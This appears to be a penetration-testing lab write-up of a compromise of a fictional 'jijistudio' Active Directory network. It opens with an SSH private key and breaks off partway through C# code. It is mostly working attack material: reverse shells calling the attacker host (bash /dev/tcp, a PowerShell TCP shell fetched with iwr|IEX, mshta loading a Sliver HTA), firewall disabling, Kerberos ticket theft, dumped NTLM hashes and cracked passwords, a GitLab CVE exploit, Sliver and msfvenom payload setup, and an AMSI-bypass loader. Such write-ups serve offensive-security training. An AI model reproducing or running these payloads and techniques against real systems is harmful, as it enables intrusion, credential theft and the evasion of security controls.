GaK/nBQFOjbya7m5nbFI0g6z+ulN/V3HK1RS6bgCA5bmmTUt+jcnLqI3ZT3UYVBMvxwun2iCtCNbhUvkIM/rYOX10q1cQM/fhQwsIBJJxzFJ9to0ZBEObPeK007iJV+kl+vYeopKQBug3T5iG2I1IWRb6aSaMGFs+RtCTG6g24mvyLYAiXC/7EwHOdbVl5Pc0iNa4l4tHbp/AuW1GXlEHI8fqx0S7GsCGDbddRWn7lPqq4gBcCs68Azk5ErkuepXs/ToLdsFZL+bhQWVpo9xzyjyNmuB8/2KaK3WNBoUdWDx/qKKwqNsU+80PFrCWLVcUwLncvTWpuMRL12kqemm4SEhcdqAZPGN+4+dh8IkPxstSm6NvTXTr1yuTlAlhqCnFZ155BolwE96T31NYieQ4tgGzF+Z8IjTkBAAAAwQCt7qIb/pqKoKUGeGUQwyALo5LMWPfIZ8dUv/m48lAZ4Pl7u/S4MnlgHPEkfdT5dvLH3LI64akf86C/4mT8/7GF1XbQF69aJKQDHd6c/uhVB2D3FQWc2rvORK7o4Vg1Aa/K4p0FzxnygIJpUsoDk7XYwvR3p447nY8wXLLvrnTslKH/qt05mgHIgtIu2nBg44M8SGvjb3JOX+pKoJdiv6OlBrJxfNGqfJ5im3U3KkTmoC8LCzuzq7D74aWVBZhzVLcAAADBAPfK+0QfvpBN7GG0EpOWWAaxUSmKx0cjoEr/S56CQRpezOQ5+qHtJTA76PqzNBapcc73ONehXG2doDNOkq7x2nBjXWEGs/XC5mtRUiJtiDn9cQA2T/pmFI/z4sYetjpULOFXzvyiS6IUn2qqqy3UHAxYic6JQJyPzie5yZdI6Rv+7xOAqJLCQWW45yNauBowEM/XOtqw/YMe2ubyVuTeuiKObnBiJpx6PutpwHvprqkiLLZgV/p0L/S9LvFNjNZ5oQAAAMEA0wb/aFDw8QbjsSq2KV0RH8dxm9Yo8dPVIxlJOOAdfZkNW+mQVNAsVOnPU0OFIj88dxsdnaFe/QMFsFzRy/lHmsRE7VHhuDDKI+vZfk7l/TIh0TgOKwoZhMqM1FK7jGBuRx6DVhNVkGHsDUHCzrtbs5CgI0y1oWYv6EWbNXRB/l+EzUp/ObD8abunSIbT3QgnfRCvfMAOlNBS3dONU4viJn71eP/H7J8E7rCCXoG6mXEEK0U7o4QcYBGy7nGn4hjXAAAADnhjdEBrYWxpLWNsZWFuAQIDBA==

We already have the IP for vault02 in our /etc/hosts file but we can quickly confirm it using nslookup.

nslookup vault02.jijistudio.com

Now we have the IP and SSH private key for VAULT02 machine but we still don’t know the user this private key belongs to.

172.16.118.107 (VAULT02)

Initial foothold

As we don’t know to which user the private ssh key belongs to we first try to login on the machine using michael.adams credential.

ssh michael.adams@jijistudio.com@172.16.118.107

Host Recon

After enumeration the home directory of both the users on the machine vault and vault02, we found .ssh folder in the home directory of user vault.

So most probably the private key obtained form CLIENT01 belong to vault user.

Lateral Movement as vault user

ssh -i vault02.key vault@172.16.118.107

Once we login on the system we found the local.txt file in the home directory.

Local.txt (VAULT02)

1819b67e2af7bb2a2325c21b1baac265

Host Recon/ Privilege Escalation

In the home directory of vault user we also found vault.yaml file which is ansible vault file.

cat vault.yaml

$ANSIBLE_VAULT;1.1;AES256
363730653136366635393366343532313566646332653537333437653762386437656431353061646433383662343131393731393762363766616463613938380a623764636233306536623537383739323838373866363139323631653635373033643565353262303664653130653930666462633336353466396334623462620a38326465356334343430336665663861663535393736613338323231363464313931663332376266373938636564633130373534383538323134366231393231

We download the file on our local system and convert into format that john can crack.

python3 /usr/share/john/ansible2john.py ./vault.yaml

We save this file as vault.txt

vim vault.txt

$ansible$0*0*670e166f593f45215fdc2e57347e7b8d7ed150add386b41197197b67fadca988*82de5c44403fef8af55976a3822164d191f327bf798cedc107548582146b1921*b7dcb30e6b5787928878f619261e65703d5e52b06de10e90fdbc3654f9c4b4bb

Once the file is saved we use john to crack the vault password using rockyou.txt wordlist.

john --wordlist=rockyou.txt vault.txt

Ansible vault password

Blink182

Using the vault password we try to decrypt the vault.yaml file password.

cat vault.yaml | ansible-vault decrypt

Root password on vault02

SummerWaitingForce214

Logging in as root user on vault02

su root

SummerWaitingForce214

Proof.txt (VAULT02)

ae67aa3f9a21c71a9905d043aa5ef353

Post exploitation/Host Recon

In the /opt/playbook folder we found a ansible playbook file db05.yaml.

The file update and upgrades the DB05 linux system. We try to execute it manually.

 ansible-playbook db05.yaml --become --ask-vault-pass

It does indeed works and updates and upgrades the system as root user. WHat we can do here is to change the yaml file or run ad-hoc command on DB05 using ansible.

We used ansible ad-hoc command to get a reverse shell on our kali system.

ansible db05 -a "bash -c 'exec bash -i &>/dev/tcp/192.168.49.118/80 <&1'"

172.16.118.108 (DB05) (One Flag)

Once we execute ansible ad-hoc command on VAULT02 we get a reverse shell on our local machine.

Initial Foothold

nc -lvnp 80

As we got the shell as root user we can simply change the password of the root user using following commands.

sudo passwd root

SummerWaitingForce214

In the root directory of DB05 machine we find proof.txt file

Proof.txt (DB05)

b925d8fcf8fd68d6d3cd4cf54e7a61ba

Post exploitation/Host Recon

Enumerating the machine further we found ccache file of user Rhys.Lucas who is a domain admin in jijistudio.com domain.

We copy the file in root directory. `

 cp krb5cc_1983001104_YMfm8E /root/

We then start http server to transfer the file on to our local system.

python3 -m http.server 8080
 

wget http://172.16.118.108:8080/krb5cc_1983001104_YMfm8E

Once downloaded we can export the ccache file in current terminal sessions.

export KRB5CCNAME=krb5cc_1983001104_YMfm8E

klist

Now we have TGT of Rhys.Lucas User which we can use to access any system in the domain JIJISTUDIO.COM.

172.16.118.105 (MAIL01) PART - 2

Initial Foothold

After obtaining the TGT of Rhys.Lucas we again came to MAIL01 and executed our shellcode runner using nxc.

nxc smb 172.16.118.105 --use-kcache -x 'mshta.exe http://192.168.49.118/sliver64.hta' --exec-method smbexec

We obtain system shell on the machine MAIL01.

Post exploitation/Host Recon

We tried to find the flags on the system using following commands but there were not flags on the machine.

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path $_.Root -Filter proof.txt -Recurse -ErrorAction SilentlyContinue
}

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path $_.Root -Filter local.txt -Recurse -ErrorAction SilentlyContinue
}

172.16.118.100 (DC01)

Initial Foothold

We again use the TGT of Rhys.Lucas to run our shellcode runner on DC01 machine using nxc.

nxc smb 172.16.118.100 --use-kcache -x 'mshta.exe http://192.168.49.118/sliver64.hta' --exec-method smbexec

Post exploitation/Host Recon

We again tried to find the flags on the system using following commands but there were not flags on the machine as well.

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path $_.Root -Filter proof.txt -Recurse -ErrorAction SilentlyContinue
}

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path $_.Root -Filter local.txt -Recurse -ErrorAction SilentlyContinue
}

Credential Theft using nxc

nxc smb 172.16.118.100 --use-kcache -M ntdsutil

Loot

Hash of all the user in jijistudio domain.

The hashes for the users and machines of dev.jijistudio.com were just the empty hash or to say invalid hash and were all the same.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:226743e172b016fe491c4a0658ad427b::: (status=Enabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ee844b3343124f60f92bc86f0d86fba7::: (status=Enabled)
jijistudio.com\Rhys.Lucas:1104:aad3b435b51404eeaad3b435b51404ee:2870dcc12cbb7c7b85063ec124b906df::: (status=Enabled)
jijistudio.com\Nicholas.Lawrence:1105:aad3b435b51404eeaad3b435b51404ee:cd88ff464d3f3726a5c90782b82a5fb9::: (status=Enabled)
jijistudio.com\Amelia.Hughes:1106:aad3b435b51404eeaad3b435b51404ee:e0f72698bbf8ab2291f5c8dc3f8d9d2d::: (status=Enabled)
jijistudio.com\Bruce.Perry:1107:aad3b435b51404eeaad3b435b51404ee:c44f74c139f4bbadec7a5b3a918bd417::: (status=Enabled)
jijistudio.com\Michael.Adams:1108:aad3b435b51404eeaad3b435b51404ee:0dc99abd62ad730818351030d595da7d::: (status=Enabled)
jijistudio.com\Rachel.Scott:1110:aad3b435b51404eeaad3b435b51404ee:1938311d2e9eb23d435a386c1bfe38eb::: (status=Enabled)
jijistudio.com\Dean.Davison:1111:aad3b435b51404eeaad3b435b51404ee:87190843838e689b302ff39ff387aa56::: (status=Enabled)
jijistudio.com\Tracy.Kelly:1112:aad3b435b51404eeaad3b435b51404ee:bcfc4d56848f3f25ffc83a2ae9489f52::: (status=Enabled)
jijistudio.com\Dominic.White:1113:aad3b435b51404eeaad3b435b51404ee:03bedd46ac29f282e7acf404dacd9c38::: (status=Enabled)
jijistudio.com\Caroline.Harris:1114:aad3b435b51404eeaad3b435b51404ee:c6706514bb7ebb2da052b6907013f5e9::: (status=Enabled)
jijistudio.com\Amelia.Stanley:1116:aad3b435b51404eeaad3b435b51404ee:ec616ae493a309758e94082d9096c4cc::: (status=Enabled)
jijistudio.com\Roy.Yates:1117:aad3b435b51404eeaad3b435b51404ee:4132d1cbc56251608efeb0cf953e49e0::: (status=Enabled)
jijistudio.com\Elaine.Brooks:1118:aad3b435b51404eeaad3b435b51404ee:2515544b0470279f20d599b9116263eb::: (status=Enabled)
jijistudio.com\Lydia.Holland:1119:aad3b435b51404eeaad3b435b51404ee:9ad3e6a98fead626fde13de3e4bdfd83::: (status=Enabled)
jijistudio.com\Scott.Smith:1120:aad3b435b51404eeaad3b435b51404ee:768339fffa5c656381817b95c52e4bc0::: (status=Enabled)
DEV$:1121:aad3b435b51404eeaad3b435b51404ee:7e8ec259e7f2089d26d7045aa0158df6::: (status=Enabled)
WEB05$:1122:aad3b435b51404eeaad3b435b51404ee:99abb6fddbfb52c5655c3723f6959733::: (status=Enabled)
FILE02$:1123:aad3b435b51404eeaad3b435b51404ee:ca2576c3154827e2528d20b46b907822::: (status=Enabled)
MAIL01$:1124:aad3b435b51404eeaad3b435b51404ee:534982e668607ea0553b2ddc0fbdf4b2::: (status=Enabled)
JUMP01$:1125:aad3b435b51404eeaad3b435b51404ee:96d980870f08c8c9fdd1f253d7ab331f::: (status=Enabled)
VAULT02$:1126:aad3b435b51404eeaad3b435b51404ee:db5e8bc382581aa5c13e782cadf4f115::: (status=Enabled)
DB05$:1127:aad3b435b51404eeaad3b435b51404ee:562120b732fa9eedf0f82b17cc2d1749::: (status=Enabled)
CLIENT01$:1128:aad3b435b51404eeaad3b435b51404ee:cd184cf8823e5ad7d88e1f01a44dfdd0::: (status=Enabled)
 

172.16.118.109 (JUMP01)

Initial Foothold

We again use the TGT of Rhys.Lucas to run our shellcode runner on DC01 machine using nxc.

nxc smb 172.16.118.109 --use-kcache -x 'mshta.exe http://192.168.49.118/sliver64.hta' --exec-method smbexec

Proof.txt (JUMP01)

fe36c617bca9966fa9fa9119afcaf446

Post exploitation/Host Recon

On enumeration the JUMP01 machine we found three interesting files.

psssh.ps1

This file gave us the clear text password of a user. After doing some brute-forcing, we found out that PrancingCat200 password belongs to rhys.lucas user.

do {
    sleep 5
}
until (Test-Connection -BufferSize 32 -Count 1 -ComputerName "db05.jijistudio.com" -Quiet)
 
$app = "C:\Program Files\PowerShell\7-preview\pwsh.exe"
$p = Start-Process -FilePath $app
Start-Sleep -s 10;
$wshell = New-Object -ComObject WScript.Shell
 
do
{
  $wshell.AppActivate($app)
  $wshell.SendKeys('Get-PSSession | Remove-PSSession{ENTER}')
  Start-Sleep -s 15;
  $wshell.AppActivate($app)
  $wshell.SendKeys('Invoke-Command ${(}New-PSSession -Hostname db05.jijistudio.com -SSHTransport{)} -ScriptBlock {{} id {}} {ENTER}')
  Start-Sleep -s 60;
  $wshell.AppActivate($app)
  $wshell.SendKeys('PrancingCat200{ENTER}')
  Start-Sleep -s 90;
}
While ($True)

forestshare.ps1

This file gave us another password Schoollargewellhuman70 which was not valid for any user in the domain.

This file also gives use new IP of VAULT01 which is supposed to me mapped on X drive.

$SecPassword = ConvertTo-SecureString 'Schoollargewellhuman70' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
$localip = (Get-NetIPAddress -InterfaceAlias "Ethernet1").IPAddress
$localip2 = (Get-NetIPAddress -InterfaceAlias "Ethernet0").IPAddress
$octet = $localip.Split(".")[2]
 
New-PSDrive -Persist -Name "X" -PSProvider "FileSystem" -Root "\\10.10.$octet.117\vaultshare" -Credential $Cred
 
if($localip2 -ne "172.16.56.109"){
        remove-item (get-item $myinvocation.mycommand.path) -force
}
 

ConsoleHost_history.txt

type C:\Users\rhys.lucas\Appdata\Roaming\Microsoft\windows\Powershell\PSReadline\ConsoleHost_history.txt

This file gave us the local administrator password for vault01 UniversitySmallSpring52.

Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
$SecPassword = Convert-To-SecurePrancingCat200
String 'UniversitySmallSpring52' -AsPlainText -Force
$Cred = New-Object System.ManagementAutomation.PSCredential('Administrator', $SecPassword)
$localip = (Get-NetIPAddress -InterfaceAlias 'Ethernet1').IPAddress
$localip2 = (Get-NetIPAddress -InterfaceAlias 'Ethernet0').IPAddress
$octet = $localip.Split('.')[2]
New-PSDrive -Persist -Name "Y" -PSProvider "FileSystem" -Root "\\10.10.$octet.117\vaultshare" -Credential $Cred -Scope Global
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
 
 
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
Get-PSSession | Remove-PSSession
PrancingCat200
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
PrancingCat200
Get-PSSession | Remove-PSSession
Invoke-Command $(New-PSSession -Hostname db05.jijistudio.com -SSHTransport) -ScriptBlock { id }
 

As the machine JUMP09 have two different network interfaces, we can pivot into the network to access the VAULT01 machine.

For pivoting we again use ligolo

execute agent.exe -connect 192.168.49.118:445 --ignore-cert

10.10.78.117 (Vault01)

Enumeration

We first check if the password we found for the local Administrator on VAULT01 is valid or not using nxc.

nxc smb 10.10.78.117 -u 'Administrator' -p 'UniversitySmallSpring52' --local-auth

Initial Foothold

We first connected to the VAULT01 machine using evil-winrm

evil-winrm -i vault01.core-jijistudio.com -u 'Administrator' -p 'UniversitySmallSpring52'

As the VAULT01 is not able to communicate to our host machine directly, we won’t be able to execute our sliver shellcode runner.

For this machine we will use powershell reverse shell to connect to our local machine on port 1234

To get the reverse shell we need to setup two reverse port forwards on the JUMP09 using sliver C2.

On JUMP09 Sliver Session

We first turn off all the firewall rules on JUMP09 Machine

netsh advfirewall set allprofiles state off
netsh advfirewall set currentprofile state off

We then setup reverse port forwards using sliver C2

rportfwd add -b 8081 -r 192.168.49.118:80

rportfwd add -b 8082 -r 192.168.49.118:1234

The jump server will now forward any request coming on port 8081 to port 80 on our local kali machine.

The jump server will also forward any request coming on port 8082 to port 1234 on our local kali machine,

Getting NC Reverse Shell

On kali machine

We first start netcat listener on our kali machine on port 1234

nc -lvnp 1234

python3 -m http.server

On Vault01 Evil-winrm session

We then download and execute the reverse shell script using following command.

iwr -Uri http://10.10.78.104:8081/large1.ps1 | IEX

When the Vault01 request large1.ps1 on port 8081 on JUMP09, our reverse port forward sends that request to our local python http server.

The content of the large1.ps1 file is as shown below.

$TCPClient = New-Object Net.Sockets.TCPClient('10.10.78.104',8082 )
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
 
function WriteToStream ($String) {
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | ForEach-Object {0}
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}
WriteToStream ''
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    $Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}
    WriteToStream ($Output)
}
 
$StreamWriter.Close()

When the large1.ps1 file is executed, It makes request to the JUMP09 on port 8082, which then forwards it to our nc listener on port 1234.

We then can download the secrets.txt file to our local system

Secret.txt (VAULT01)

d487e6e137ae72fedeeaa7afe11ddf61

Post exploitation / Host Recon

Credential Theft using nxc

 nxc smb 10.10.78.117 -u 'Administrator' -p 'UniversitySmallSpring52' --local-auth

nxc smb 10.10.78.117 -u 'Administrator' -p 'UniversitySmallSpring52' --local-auth --sam

Loot

Hash of VAULT01 machine and sadmin admin user

CORE-JIJISTUDIO\VAULT01$:aad3b435b51404eeaad3b435b51404ee:5e83eca21ce9dd4a8b58082302fda474:::

sadmin:1000:aad3b435b51404eeaad3b435b51404ee:a867beaeec7e940443f587014f6ab773:::

192.168.118.110 (WEB07) PART - 2

After reach the objective of accessing the VAULT01 machine. We can start enumerating the machines that are still not pawned.

We start by enumerating 192.168.118.110 machine. After looking out for the exploits for Gitlab version 13.10. We came across CVE-2021-22205

As from our enumeration we know that there is an Administrator user root on the gitlab.

We use the above POC to first change the password of the root user.

python3 CVE-2021-22205.py -u http://web07.dev.jijistudio.com/users/ -m mod root

Now we try to login to the gitlab instance using this password (P4ss@GitLab) and we do get access as root user on the gitlab instance.

After further enumerating the newly found Repos we can accross monitor.sh file in monitor Repo.

The content of this file is as following where we found a new user monitor with password EcoStar9

We try to ssh with this newly found creds and we indeed had success on the port 22 .

Initial Foothold

ssh monitor@web07.dev.jijistudio.com

Host Recon

After enumerating the web07 machine we found out that user monitor is in sudo group.

Privilege Escalation

To perform the privilege escalation we can use the following command

sudo su

And we get shell as root user.

Now we extract the proof.txt file from the root directory

Proof.txt (WEB07)

4844784eb0af1dd7a6c437b9d186f054

Post Exploitation/ Host Recon

As this machines is AD joined we first download the /etc/krb5.keytab file to our local machine.

cp /etc/krb5.keytab /home/monitor/kr.keytab

chown monitor:monitor kr.keytab

scp monitor@172.16.118.110:/home/monitor/kr.keytab .

We then extract the hash of the machine using keytabextract tool.

../../tools/KeytabParser/KeyTabExtract/keytabextract.py kr.keytab

Loot

REALM : DEV.JIJISTUDIO.COM
	SERVICE PRINCIPAL : WEB07$/
	NTLM HASH : 9a2f951e234ebaffd6745c4184309931

In the .ssh directory of root user we found encrypted private key of user ricky.davies.

We create a new file on our system.

 vim ricky_davies_ssh.key

We then convert the ssh private key using ssh3john for cracking purpose.

 python3 /usr/share/john/ssh2john.py ricky_davies_ssh.key > rickydavies.hash

We then crack the passphrase using john.

sudo john --wordlist=../resource/rockyou.txt rickydavies.hash

The passphrase obtained for the key file is Sunshine1.

Using nxc we made a list of all the machine on the network which hash ssh enabled.

172.16.118.111 (SRV01)

Initial Foothold

We login on to SRV01 machine using the private key of ricky.davies.

ssh -i ricky.davies ricky.davies@dev.jijistudio.com@172.16.118.111

We found the local.txt flag as shown in the screenshoot below.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bca25d429b0cee9bce72dc3eaceb791:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a21f50dd00fd338a6a0f28c769b0a7d8:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:98eed43cc3e148602d0afad12ef400b4:::

nxc smb SRV01 -u 'Administrator' -H 9bca25d429b0cee9bce72dc3eaceb791 --local-auth -x 'mshta.exe http://192.168.49.118/sliver64.hta' --exec-method smbexec

APPENDIX

Resource Development for Sliver C2

Listener

https -L 192.168.49.118 -l 443

Setup for Powershell payload

profiles new -b https://192.168.49.118:443 --skip-symbols --format shellcode --arch amd64 sliver64

Stage Listener for msfvenom Payload

stage-listener --url https://192.168.49.118:8445 --profile osep_64 --prepend-size

Stage Listener for C# payload

stage-listener --url https://192.168.49.118:8446 --profile sliver64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV

stage-listener --url https://192.168.49.118:8080 --profile sliver64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV

Generating msf payload

msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.49.118 LPORT=8445 LURI=/hello.woff -f csharp -o osep_64_csharp

• XoR the above csharp with xor_encoder with key 0xfa
• Used the Process Hollowing Code from OSEP-CODE-Snippets
• Compile the code and save it as shp.exe

Generating C# shellcoder runner

sliverphollow64.txt

vim sliverphollow64.txt

The following file is generate using https://medium.com/@youcef.s.kelouaz/writing-a-sliver-c2-powershell-stager-with-shellcode-compression-and-aes-encryption-9725c0201ea8.

The code below is redacted as it was causing issues in generating pdf

$encodeStr = "TVqQAAMAAAAEAAAA.....REDACTED........wAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 
 
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://192.168.49.118:8446/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
 
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)

amsi64.txt

vim amsi64.txt

 
$HWBP = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
 
namespace HWBP
{
    public class Amsi
    {
        static string a = "msi";
        static string b = "anB";
        static string c = "ff";
        static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
        static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
        static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
 
        public static void Bypass()
        {
            WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
            ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
 
            MethodInfo method = typeof(Amsi).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
            IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
 
            Marshal.StructureToPtr(ctx, pCtx, true);
            bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
            ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
 
            EnableBreakpoint(ctx, pABuF, 0);
            WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
        }
 
        public static long Handler(IntPtr exceptions)
        {
            WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
            ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
 
            WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
            ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
 
            WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
            ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
 
            if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
            {
                ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
 
                IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean
 
                Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
 
                ContextRecord.Rip = ReturnAddress;
                ContextRecord.Rsp += 8;
                ContextRecord.Rax = 0; // S_OK
 
                Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT
                return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
            }
            else
            {
                return WinAPI.EXCEPTION_CONTINUE_SEARCH;
            }
 
        }
 
        public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
        {
            switch (index)
            {
                case 0:
                    ctx.Dr0 = (ulong)address.ToInt64();
                    break;
                case 1:
                    ctx.Dr1 = (ulong)address.ToInt64();
                    break;
                case 2:
                    ctx.Dr2 = (ulong)address.ToInt64();
                    break;
                case 3:
                    ctx.Dr3 = (ulong)address.ToInt64();
                    break;
            }
 
            ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
            ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
            ctx.Dr6 = 0;
 
            Marshal.StructureToPtr(ctx, pCtx, true);
        }
 
        public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
        {
            ulong mask = (1UL << bits) - 1UL;
            dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
            return dw;
        }
    }
 
    public class WinAPI
    {
        public const UInt32 DBG_CONTINUE = 0x00010002;
        public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
        public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
        public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
        public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
        public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
        public const Int32 EXCEPTION_DEBUG_EVENT = 1;
        public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
        public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
        public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
        public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
        public const Int32 RIP_EVENT = 9;
        public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
 
        public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
        public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
        public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
        public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
        public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
        public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
        public const UInt32 DBG_CONTROL_C = 0x40010006;
        public const UInt32 DEBUG_PROCESS = 0x00000001;
        public const UInt32 CREATE_SUSPENDED = 0x00000004;
        public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
 
        public const Int32 AMSI_RESULT_CLEAN = 0;
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
 
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
 
        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
 
        [DllImport("Kernel32.dll")]
        public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
 
        [Flags]
        public enum CONTEXT64_FLAGS : uint
        {
            CONTEXT64_AMD64 = 0x100000,
            CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
            CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
            CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
            CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
            CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
